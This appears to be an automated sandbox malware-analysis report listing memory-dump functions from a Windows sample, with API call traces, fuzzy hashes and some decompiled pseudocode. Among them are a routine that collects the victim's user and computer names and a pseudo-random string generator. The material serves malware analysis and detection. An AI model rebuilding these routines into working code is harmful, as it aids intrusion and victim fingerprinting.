                              • String ID:
                              • API String ID: 1727939831-0
                              • Opcode ID: 032d070676a7c284894674b4f2468908b4acc011820243528a584585f38166df
                              • Instruction ID: 38fdd6353262a36f070997121514bd5e91bd535d77ba3b00d2e1f6a9a3571e1a
                              • Opcode Fuzzy Hash: 032d070676a7c284894674b4f2468908b4acc011820243528a584585f38166df
                              • Instruction Fuzzy Hash: AF514BB690021AAFDF11EFA8DC849EE7BBDBF44300B048065F994E7214DB76D911DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(?,00000020), ref: 010401DF
                              • lstrcat.KERNEL32(?,00000020), ref: 010401F4
                              • lstrcmp.KERNEL32(00000000,?), ref: 0104020B
                              • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 0104022F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: ac8c1fd36c07c16fb53848c05c3d25ccd810d4af1b1952fa3823030d31351947
                              • Instruction ID: 738815817b32682fa40701fdb23308647e67118d0c13f75233563397342a273a
                              • Opcode Fuzzy Hash: ac8c1fd36c07c16fb53848c05c3d25ccd810d4af1b1952fa3823030d31351947
                              • Instruction Fuzzy Hash: F251A5B1A00118EFDB21CF98C9C46EDBBF5FF45314F0480AAFA95AB259C7719A01CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 22%
                              			E013EA90C(signed int __eax, signed int _a4, signed int _a8) {
                              				signed int _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				signed int _v20;
                              				intOrPtr _t81;
                              				char _t83;
                              				signed int _t90;
                              				signed int _t97;
                              				signed int _t99;
                              				char _t101;
                              				unsigned int _t102;
                              				intOrPtr _t103;
                              				char* _t107;
                              				signed int _t110;
                              				signed int _t113;
                              				signed int _t118;
                              				signed int _t122;
                              				intOrPtr _t124;
                              
                              				_t102 = _a8;
                              				_t118 = 0;
                              				_v20 = __eax;
                              				_t122 = (_t102 >> 2) + 1;
                              				_v8 = 0;
                              				_a8 = 0;
                              				_t81 = E013E55DC(_t122 << 2);
                              				_v16 = _t81;
                              				if(_t81 == 0) {
                              					_push(8);
                              					_pop(0);
                              					L37:
                              					return 0;
                              				}
                              				_t107 = _a4;
                              				_a4 = _t102;
                              				_t113 = 0;
                              				while(1) {
                              					_t83 =  *_t107;
                              					if(_t83 == 0) {
                              						break;
                              					}
                              					if(_t83 == 0xd || _t83 == 0xa) {
                              						if(_t118 != 0) {
                              							if(_t118 > _v8) {
                              								_v8 = _t118;
                              							}
                              							_a8 = _a8 + 1;
                              							_t118 = 0;
                              						}
                              						 *_t107 = 0;
                              						goto L16;
                              					} else {
                              						if(_t118 != 0) {
                              							L10:
                              							_t118 = _t118 + 1;
                              							L16:
                              							_t107 = _t107 + 1;
                              							_t15 =  &_a4;
                              							 *_t15 = _a4 - 1;
                              							if( *_t15 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						if(_t113 == _t122) {
                              							L21:
                              							if(_a8 <= 0x20) {
                              								_push(0xb);
                              								L34:
                              								_pop(0);
                              								L35:
                              								E013E6DFA(_v16);
                              								goto L37;
                              							}
                              							_t24 = _v8 + 5; // 0xcdd8d2f8
                              							_t103 = E013E55DC((_v8 + _t24) * _a8 + 4);
                              							if(_t103 == 0) {
                              								_push(8);
                              								goto L34;
                              							}
                              							_t90 = _a8;
                              							_a4 = _a4 & 0x00000000;
                              							_v8 = _v8 & 0x00000000;
                              							_t124 = _t103 + _t90 * 4;
                              							if(_t90 <= 0) {
                              								L31:
                              								 *0x13ed2b0 = _t103;
                              								goto L35;
                              							}
                              							do {
                              								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                              								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                              								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                              								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                              								_v12 = _v12 & 0x00000000;
                              								if(_a4 <= 0) {
                              									goto L30;
                              								} else {
                              									goto L26;
                              								}
                              								while(1) {
                              									L26:
                              									_t99 = _v12;
                              									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                              									if(_t99 == 0) {
                              										break;
                              									}
                              									_v12 = _v12 + 1;
                              									if(_v12 < _a4) {
                              										continue;
                              									}
                              									goto L30;
                              								}
                              								_v8 = _v8 - 1;
                              								L30:
                              								_t97 = _a4;
                              								_a4 = _a4 + 1;
                              								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                              								__imp__(_t124);
                              								_v8 = _v8 + 1;
                              								_t124 = _t124 + _t97 + 1;
                              							} while (_v8 < _a8);
                              							goto L31;
                              						}
                              						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                              						_t101 = _t83;
                              						if(_t83 - 0x61 <= 0x19) {
                              							_t101 = _t101 - 0x20;
                              						}
                              						 *_t107 = _t101;
                              						_t113 = _t113 + 1;
                              						goto L10;
                              					}
                              				}
                              				if(_t118 != 0) {
                              					if(_t118 > _v8) {
                              						_v8 = _t118;
                              					}
                              					_a8 = _a8 + 1;
                              				}
                              				goto L21;
                              			}
                              0x013ea913
                              0x013ea91a
                              0x013ea91f
                              0x013ea922
                              0x013ea929
                              0x013ea92c
                              0x013ea92f
                              0x013ea936
                              0x013ea939
                              0x013eaa8d
                              0x013eaa8f
                              0x013eaa91
                              0x013eaa96
                              0x013eaa96
                              0x013ea93f
                              0x013ea942
                              0x013ea945
                              0x013ea947
                              0x013ea947
                              0x013ea94b
                              0x00000000
                              0x00000000
                              0x013ea94f
                              0x013ea97b
                              0x013ea980
                              0x013ea982
                              0x013ea982
                              0x013ea985
                              0x013ea988
                              0x013ea988
                              0x013ea98a
                              0x00000000
                              0x013ea955
                              0x013ea957
                              0x013ea976
                              0x013ea976
                              0x013ea98d
                              0x013ea98d
                              0x013ea98e
                              0x013ea98e
                              0x013ea991
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013ea991
                              0x013ea95b
                              0x013ea9a2
                              0x013ea9a6
                              0x013eaa80
                              0x013eaa82
                              0x013eaa82
                              0x013eaa83
                              0x013eaa86
                              0x00000000
                              0x013eaa86
                              0x013ea9af
                              0x013ea9c0
                              0x013ea9c4
                              0x013eaa7c
                              0x00000000
                              0x013eaa7c
                              0x013ea9ca
                              0x013ea9cd
                              0x013ea9d1
                              0x013ea9d7
                              0x013ea9da
                              0x013eaa72
                              0x013eaa72
                              0x00000000
                              0x013eaa78
                              0x013ea9e5
                              0x013ea9ee
                              0x013eaa02
                              0x013eaa09
                              0x013eaa1e
                              0x013eaa24
                              0x013eaa2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eaa2e
                              0x013eaa2e
                              0x013eaa2e
                              0x013eaa35
                              0x013eaa3d
                              0x00000000
                              0x00000000
                              0x013eaa3f
                              0x013eaa48
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eaa4a
                              0x013eaa4c
                              0x013eaa4f
                              0x013eaa4f
                              0x013eaa52
                              0x013eaa56
                              0x013eaa59
                              0x013eaa5f
                              0x013eaa62
                              0x013eaa69
                              0x00000000
                              0x013ea9e5
                              0x013ea960
                              0x013ea96b
                              0x013ea96e
                              0x013ea970
                              0x013ea970
                              0x013ea973
                              0x013ea975
                              0x00000000
                              0x013ea975
                              0x013ea94f
                              0x013ea995
                              0x013ea99a
                              0x013ea99c
                              0x013ea99c
                              0x013ea99f
                              0x013ea99f
                              0x00000000

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • lstrcpy.KERNEL32(69B25F45,00000020), ref: 013EAA09
                              • lstrcat.KERNEL32(69B25F45,00000020), ref: 013EAA1E
                              • lstrcmp.KERNEL32(00000000,69B25F45), ref: 013EAA35
                              • lstrlen.KERNEL32(69B25F45), ref: 013EAA59
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: b99c407d71ed870f08433fd5466f5060c8bf7fec23ebf78c8b8b6a045ef71bf4
                              • Instruction ID: 5003a2103d95ce7bb77025e5b0aa38ae4a64058358db2790bdcfa23da2b6ba08
                              • Opcode Fuzzy Hash: b99c407d71ed870f08433fd5466f5060c8bf7fec23ebf78c8b8b6a045ef71bf4
                              • Instruction Fuzzy Hash: 90519035A00328EBEF21CF99C5486ADBBF6EF45319F15805AE9559B281C7709A41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                              • WaitForSingleObject.KERNEL32(00000000,?,04B39940,?,00000000,00000000,00000001), ref: 01041C7F
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 01041CB9
                              • RegCloseKey.ADVAPI32(?), ref: 01041CE5
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01041D49
                              • RtlExitUserThread.NTDLL(?), ref: 01041D7F
                                • Part of subcall function 010252BE: CreateFileW.KERNEL32(-00000007,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,?,?,?,01033518,00000000,?,?), ref: 010252DC
                                • Part of subcall function 010252BE: GetFileSize.KERNEL32(00000000,00000000,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 010252EC
                                • Part of subcall function 010252BE: CloseHandle.KERNEL32(000000FF,?,?,01033518,00000000,?,?,00000000,00000000), ref: 0102534E
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                              • String ID:
                              • API String ID: 796380773-0
                              • Opcode ID: 08e195dc01d3e1d078d6178a1d9a5529313651c524a7f57ba483e08b142c3a5c
                              • Instruction ID: 997fe0cd9102560b40fe1c021eb97f4f035e87f70a493883615ce4fb0d3e9b43
                              • Opcode Fuzzy Hash: 08e195dc01d3e1d078d6178a1d9a5529313651c524a7f57ba483e08b142c3a5c
                              • Instruction Fuzzy Hash: EF514FB5A00209AFDB21DFA8C9C4EEE77FDEB08300F040066F694E7295D775AA44CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01027FEB
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01027FFC
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 0102800E
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01028020
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01028032
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 0102803E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 170fcafe0b55252848618577144821c2f40327483178d47416f4432196885457
                              • Instruction ID: a0569d22a378ed6be04f9f67bc3e0ef121a60fcc32ce12f0cff9f3a971d06565
                              • Opcode Fuzzy Hash: 170fcafe0b55252848618577144821c2f40327483178d47416f4432196885457
                              • Instruction Fuzzy Hash: E2414275E00219AFDBA4DFA9C8C4A6EB7F9BF88204B14C86EE595E3201D774D9048B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103DC2A: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0103DC36
                                • Part of subcall function 0103DC2A: SetLastError.KERNEL32(000000B7,?,01028C04), ref: 0103DC47
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01028C24
                              • CloseHandle.KERNEL32(00000000), ref: 01028CFC
                                • Part of subcall function 0103D4BA: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                                • Part of subcall function 0103D4BA: CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                                • Part of subcall function 0103D4BA: GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 0103D4BA: GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                                • Part of subcall function 0103D4BA: SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                                • Part of subcall function 0103D4BA: HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              • GetLastError.KERNEL32(?), ref: 01028CE5
                              • ReleaseMutex.KERNEL32(00000000), ref: 01028CEE
                                • Part of subcall function 0103DC2A: CreateMutexA.KERNEL32(01050244,00000000,?,?,01028C04), ref: 0103DC5A
                              • GetLastError.KERNEL32 ref: 01028D09
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                              • String ID:
                              • API String ID: 1700416623-0
                              • Opcode ID: 9b0c44d0de7b7c6f627ca3d5aa6b9eeb19207bef3dad7e21e58c2bfbb918b909
                              • Instruction ID: 1c17f8c8635a9223abda366d21f7cfb021662b16651eb7ee19ea2e9faf806d15
                              • Opcode Fuzzy Hash: 9b0c44d0de7b7c6f627ca3d5aa6b9eeb19207bef3dad7e21e58c2bfbb918b909
                              • Instruction Fuzzy Hash: 1B3184B9A0020ADFDB219F79D9848AE7BFAFB95300B204467F9C2D7254EB758800CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 0102F2EF
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                              • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0102F331
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0102F383
                              • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 0102F39C
                                • Part of subcall function 0102122D: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0102124E
                                • Part of subcall function 0102122D: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 01021291
                              • GetLastError.KERNEL32 ref: 0102F3D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                              • String ID:
                              • API String ID: 1921436656-0
                              • Opcode ID: ef48b9b77c08ed592a0c76883f04795819fc0b72b22fcbd7242d0d753868f099
                              • Instruction ID: 5bb7297634c39fd9c7165c917835601904e67c8f0e0ded19d969e2c6a4e5565e
                              • Opcode Fuzzy Hash: ef48b9b77c08ed592a0c76883f04795819fc0b72b22fcbd7242d0d753868f099
                              • Instruction Fuzzy Hash: 3C3150B5A0022AEFDF61DFA8C980BAE7BF4EF08390F008055F985E7254D7759940CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0103A1B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103A1CD
                              • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0103A1DA
                              • lstrlen.KERNEL32(01051316,?,?,?,?,?,00000000,00000000,00000000), ref: 0103A1EC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0103A21D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                              • String ID:
                              • API String ID: 2734445380-0
                              • Opcode ID: faa1e37fb4283c178214f2724d6ee9421ffd6b31d0a60f74cf3a66208902a014
                              • Instruction ID: 018709e79dafb6675cfd8986e003f3f5cfa463252413dc9ebdc5344c7010a3da
                              • Opcode Fuzzy Hash: faa1e37fb4283c178214f2724d6ee9421ffd6b31d0a60f74cf3a66208902a014
                              • Instruction Fuzzy Hash: 02316BB5A00219EFDB11DF99DC88EEF7BB9EB44350F004564F98593200D7799911CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0102A661
                              • memcpy.NTDLL(00000000,?,?), ref: 0102A672
                              • lstrcmpi.KERNEL32(00000002,?), ref: 0102A6B8
                              • memcpy.NTDLL(00000000,?,?), ref: 0102A6CC
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0102A712
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 620373d5defc596f9da7f3968789873972f83b4be86fc74adf2df95c957f4157
                              • Instruction ID: f596b429856e55fc2b456ceb85b8163060f9b507e4d5ccca1411e65e0510cc02
                              • Opcode Fuzzy Hash: 620373d5defc596f9da7f3968789873972f83b4be86fc74adf2df95c957f4157
                              • Instruction Fuzzy Hash: A8319176A00229EFDB21DFA8DC88AAE7BF8FF48354F144069F98593210DB759D44CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102C05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,0102BDA2,00000000,00000000,00000000,00000000), ref: 0102C068
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102BDB8
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102BDCB
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102BDDC
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0102BE47
                              • InterlockedIncrement.KERNEL32(0105049C), ref: 0102BE5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: fb712b8afb07ba4ff725b0fa6d49f139529b5002022e3de63d48e43818e6704e
                              • Instruction ID: dea4a7beb1bea02babed4c26bb61a392a4f6c6dc3e0fda0b3c2e04a2bb37edeb
                              • Opcode Fuzzy Hash: fb712b8afb07ba4ff725b0fa6d49f139529b5002022e3de63d48e43818e6704e
                              • Instruction Fuzzy Hash: 55319AB1A00212DFDB61DF18C84496EBBE9FF44320F048959FAD683254CB35D815CF92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,01028E67,00000000,747DF5B0,01025001,?,00000001,?,00000000), ref: 0103A7C3
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0103A7D8
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0103A7F4
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103A809
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103A81D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: c733910f67af1935f00f598239869c2e0a3c02c7dc8a0859503263f45778ae8b
                              • Instruction ID: 2cf0cd367ec731b679e938699758d6088431f04e8c7b0466e47cb585660647a6
                              • Opcode Fuzzy Hash: c733910f67af1935f00f598239869c2e0a3c02c7dc8a0859503263f45778ae8b
                              • Instruction Fuzzy Hash: CE314AB6640316DFD721CF6CE9C4A9B73E9FB49310B01006AF6C5DB218D77AA802CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 0103FFA0
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0103FFA9
                              • GetLastError.KERNEL32 ref: 0103FFB3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01040072
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: cc67496ba8ccebd7fff5ef724623392e59aa5916bf7dd60f31175fb553199fb7
                              • Instruction ID: 1b000290b4f8f85cc9d9c73fd65f2b701352643ffab90fb6f71e6fe0f04dfe29
                              • Opcode Fuzzy Hash: cc67496ba8ccebd7fff5ef724623392e59aa5916bf7dd60f31175fb553199fb7
                              • Instruction Fuzzy Hash: 70213DF2641215ABC720FBA4EDCCEDB339CEF6A360F050921B6D5C7148DA79A504C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E8941() {
                              				long _v8;
                              				long _v12;
                              				int _v16;
                              				long _t39;
                              				long _t43;
                              				signed int _t47;
                              				signed int _t52;
                              				int _t56;
                              				int _t57;
                              				char* _t63;
                              				short* _t66;
                              
                              				_v16 = 0;
                              				_v8 = 0;
                              				GetUserNameW(0,  &_v8);
                              				_t39 = _v8;
                              				if(_t39 != 0) {
                              					_v12 = _t39;
                              					_v8 = 0;
                              					GetComputerNameW(0,  &_v8);
                              					_t43 = _v8;
                              					if(_t43 != 0) {
                              						_t11 = _t43 + 2; // 0x74785522
                              						_v12 = _v12 + _t11;
                              						_t63 = E013E55DC(_v12 + _t11 << 2);
                              						if(_t63 != 0) {
                              							_t47 = _v12;
                              							_t66 = _t63 + _t47 * 2;
                              							_v8 = _t47;
                              							if(GetUserNameW(_t66,  &_v8) == 0) {
                              								L7:
                              								E013E6DFA(_t63);
                              							} else {
                              								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                              								_t52 = _v8;
                              								_v12 = _v12 - _t52;
                              								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                              									goto L7;
                              								} else {
                              									_t56 = _v12 + _v8;
                              									_t31 = _t56 + 2; // 0x13e642f
                              									_v12 = _t56;
                              									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                              									_v8 = _t57;
                              									if(_t57 == 0) {
                              										goto L7;
                              									} else {
                              										_t63[_t57] = 0;
                              										_v16 = _t63;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _v16;
                              			}

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,013E642D), ref: 013E8955
                              • GetComputerNameW.KERNEL32(00000000,013E642D), ref: 013E8971
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetUserNameW.ADVAPI32(00000000,013E642D), ref: 013E89AB
                              • GetComputerNameW.KERNEL32(013E642D,74785520), ref: 013E89CD
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,013E642D,00000000,013E642F,00000000,00000000,?,74785520,013E642D), ref: 013E89F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: 33f2503547168e64c9d9b5fa81e878aeffdbf2bf099ed20ca3951d8b2d6b01f0
                              • Instruction ID: 91f2ff6536a3b4227d302d0da3efd6a9282ce238a6fa0173cdef1d1894d24236
                              • Opcode Fuzzy Hash: 33f2503547168e64c9d9b5fa81e878aeffdbf2bf099ed20ca3951d8b2d6b01f0
                              • Instruction Fuzzy Hash: FF21D876D00258EFDB21DFE9C9889EEBBFCEE44348B5444AAE501E7240DB309B459B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(-00000007,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,?,?,?,01033518,00000000,?,?), ref: 010252DC
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 010252EC
                              • ReadFile.KERNEL32(-00000007,00000000,00000000,01038E28,00000000,00000001,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28), ref: 01025318
                              • GetLastError.KERNEL32(?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 0102533D
                              • CloseHandle.KERNEL32(000000FF,?,?,01033518,00000000,?,?,00000000,00000000), ref: 0102534E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastReadSize
                              • String ID:
                              • API String ID: 3577853679-0
                              • Opcode ID: bfb2d3f3fd7da22b1690034b3ee82532b682e2a9acd70b2c9cdfa030ffad03f5
                              • Instruction ID: 36f9ef1c7e97cc746d0ac678a7041b1aacae905df8c794fc00f6f46230c4f287
